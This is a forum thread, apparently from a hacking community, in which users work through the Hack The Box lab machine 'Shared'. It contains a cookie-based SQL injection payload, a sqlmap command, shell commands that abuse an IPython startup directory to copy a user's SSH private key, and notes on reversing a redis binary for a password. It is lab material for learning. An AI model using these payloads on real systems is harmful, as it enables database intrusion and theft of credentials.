Shared - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
(July 23, 2022, 10:08 PM)OldName2 Wrote:
(July 23, 2022, 09:57 PM)Exa Wrote:
(July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.

That might be injectable.


Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.


It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5


(July 23, 2022, 10:08 PM)OldName2 Wrote:
(July 23, 2022, 09:57 PM)Exa Wrote:
(July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.

That might be injectable.


Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.


It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5


Uh got it working
{"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"}


Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response
Reply
(July 24, 2022, 12:41 AM)vinciwashere Wrote:
(July 23, 2022, 10:08 PM)OldName2 Wrote:
(July 23, 2022, 09:57 PM)Exa Wrote:
(July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.

That might be injectable.


Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.


It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5


(July 23, 2022, 10:08 PM)OldName2 Wrote:
(July 23, 2022, 09:57 PM)Exa Wrote:
(July 23, 2022, 08:11 PM)OldName2 Wrote: If you put something in the cart and proceed to checkout you'll be redirected to checkout.shared.htb with the cart contents within a cookie.

That might be injectable.


Changing the cookie from {"53GG2EF8":"1"} to {"53GG'+'2EF8":"1"} does not make a difference. This might be an SQL injection.


It has to be, but im not getting it to work. I've also tried SQLMAP
sqlmap -u "https://checkout.shared.htb/" --cookie "custom_cart={"*":"1*","*":"1"}" -batch --level=5


Uh got it working
{"53G'+'G2EF8'UNION SELECT NULL,NULL,NULL-- -":"1"}


Bit confused on what the whole sqlmap payload was? Trying similar ones but it's not giving me a response

it wont work like This....  Try Doing it manuley . First go to Order Something then change the Cookie . When you are Done Click Cont... to order and it will send you to checkout subdomain and you will See it.
Reply
(July 24, 2022, 12:27 AM)blahblah Wrote:
(July 23, 2022, 11:58 PM)yumi Wrote: /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython

Searching in web about ipython


Found That https://security.snyk.io/vuln/SNYK-PYTHON-IPYTHON-2348630

ipython --version Shows : 8.0.0


(July 24, 2022, 12:27 AM)blahblah Wrote:
(July 23, 2022, 11:58 PM)yumi Wrote: /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython

Searching in web about ipython


Found That https://security.snyk.io/vuln/SNYK-PYTHON-IPYTHON-2348630

ipython --version Shows : 8.0.0


and This looks  Fine :  https://github.com/ipython/ipython/security/advisories/GHSA-pq7m-3gw7-gq5x


Yes I found it and I'm testing some scripts the scripts are deleted but so far I can't get a shell, maybe copying the ssh key to another location if it has
Reply
mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup

echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py


and look in the '/home/dan_smith' folder
Reply
(July 24, 2022, 01:10 AM)Truss46 Wrote:
mkdir -m 777 /opt/scripts_review/profile_default
mkdir -m 777 /opt/scripts_review/profile_default/startup

echo "import os; os.system('cat ~/.ssh/id_rsa > ~/rsa')" > /opt/scripts_review/profile_default/startup/foo.py


and look in the '/home/dan_smith' folder


Woop ! , I did not know that i need to make new dir ! , I was Thinking it already has been Created but Okay Thanks !.
Reply
looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.
Reply
(July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.


There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?
Reply
(July 24, 2022, 02:47 AM)blahblah Wrote:
(July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.


There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?


tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis
Reply
(July 24, 2022, 02:52 AM)rubymurakami Wrote:
(July 24, 2022, 02:47 AM)blahblah Wrote:
(July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.


There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?


tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis


Using r2 Then afl Showed me This   :    sym.github.com_go_redis_redis._Conn_.Auth  , Try it with me Since i dont know r2 That much
Reply
(July 24, 2022, 02:54 AM)blahblah Wrote:
(July 24, 2022, 02:52 AM)rubymurakami Wrote:
(July 24, 2022, 02:47 AM)blahblah Wrote:
(July 24, 2022, 02:17 AM)rubymurakami Wrote: looks like redis is the way to root there is /usr/local/redis_connector_dev but can't figure out where the pass is in it.


There Some Text if you use Strings on it ..... But Still Could not Find anything , Did you Find Something ?


tried the exact same thing nothing just yet but I am sure it has to be this file since the output when running the command states logging in to redis


Using r2 Then afl Showed me This   :    sym.github.com_go_redis_redis._Conn_.Auth  , Try it with me Since i dont know r2 That much


I'm not a pro with it either about to read up on it right now I think we are heading in the right direction to say the least.
Reply


 Users viewing this thread: Shared - HTB [Discussion]: No users currently viewing.